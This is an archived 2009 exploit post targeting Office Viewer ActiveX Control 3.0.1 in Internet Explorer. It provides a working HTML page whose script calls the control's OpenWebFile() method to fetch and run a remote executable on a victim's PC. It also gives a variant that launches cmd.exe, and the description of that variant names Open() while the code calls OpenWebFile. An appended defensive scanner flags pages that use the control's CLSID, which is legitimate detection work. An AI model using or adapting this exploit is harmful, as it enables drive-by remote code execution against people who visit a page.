Tuesday, January 13, 2009

Office Viewer ActiveX Control 3.0.1 Remote File Execution Exploit

=======================================================================================

Author: Houssamix

=======================================================================================


Office Viewer ActiveX Control v 3.0.1 Remote File execution exploit

Download: http://www.anydraw.com/download/EOfficeOCX.exe



Tested on Windows XP Professional SP2 with Internet Explorer 6



Description: this exploit uses the insecure method "OpenWebFile()" to execute a remote file on the victim's PC.

You can also execute a local file on the victim's PC using the method "Open()"; just replace the function Do_it with this:

function Do_it()
{
File = "c:\\windows\\system32\\cmd.exe"
hsmx.OpenWebFile(File)
}


=======================================================================================

<HTML>
<BODY>
<object id=hsmx classid="clsid:{97AF4A45-49BE-4485-9F55-91AB40F288F2}"></object>

<SCRIPT>

function Do_it()
{
File = "http://test.com/file.exe"
hsmx.OpenWebFile(File)
}


</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="exploit">

</body>
</HTML>

# milw0rm.com [2009-01-13]
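
Added example, not part of the original advisory: a static triage check a defender could run over saved HTML to flag pages that instantiate this control by its CLSID and call `OpenWebFile()` or `Open()` on it. The function names and the sample pages are constructed for illustration.

```javascript
// Added example: CLSID and method names are from the advisory above;
// function names and sample pages are constructed for illustration.
const CLSID = "97AF4A45-49BE-4485-9F55-91AB40F288F2";
const RISKY_METHODS = ["OpenWebFile", "Open"];

// Return the id of every <object> element that instantiates the control.
function findControlIds(html) {
  const classid = new RegExp("classid\\s*=\\s*[\"']?clsid:\\{?" + CLSID + "\\}?", "i");
  const ids = [];
  for (const [tag] of html.matchAll(/<object\b[^>]*>/gi)) {
    if (!classid.test(tag)) continue;
    const id = /\bid\s*=\s*["']?([A-Za-z_]\w*)/i.exec(tag);
    ids.push(id ? id[1] : null); // null: control loaded but has no usable id
  }
  return ids;
}

// Report every risky method call made on an instance of the control.
function scanPage(html) {
  const findings = [];
  for (const id of findControlIds(html)) {
    if (id === null) {
      findings.push({ id: null, method: null, arg: null });
      continue;
    }
    for (const method of RISKY_METHODS) {
      const call = new RegExp("\\b" + id + "\\s*\\.\\s*" + method + "\\s*\\(([^)]*)\\)", "g");
      for (const m of html.matchAll(call)) {
        findings.push({ id, method, arg: m[1].trim() });
      }
    }
  }
  return findings;
}

// Constructed sample pages (not captured traffic).
const SAMPLE_FLAGGED = `<object id=hsmx classid="clsid:{97AF4A45-49BE-4485-9F55-91AB40F288F2}"></object>
<script>function Do_it(){ File = "http://example.invalid/file.exe"; hsmx.OpenWebFile(File) }</script>`;
const SAMPLE_UNRELATED = `<object id="viewer" classid="clsid:{00000000-0000-0000-0000-000000000000}"></object>
<script>viewer.Open("report.doc")</script>`;

console.log(scanPage(SAMPLE_FLAGGED));   // one finding: hsmx.OpenWebFile(File)
console.log(scanPage(SAMPLE_UNRELATED)); // no findings
```

A page that builds the object tag dynamically will not be caught by this static match, so treat a clean result as "nothing obvious" rather than as proof the control is unused.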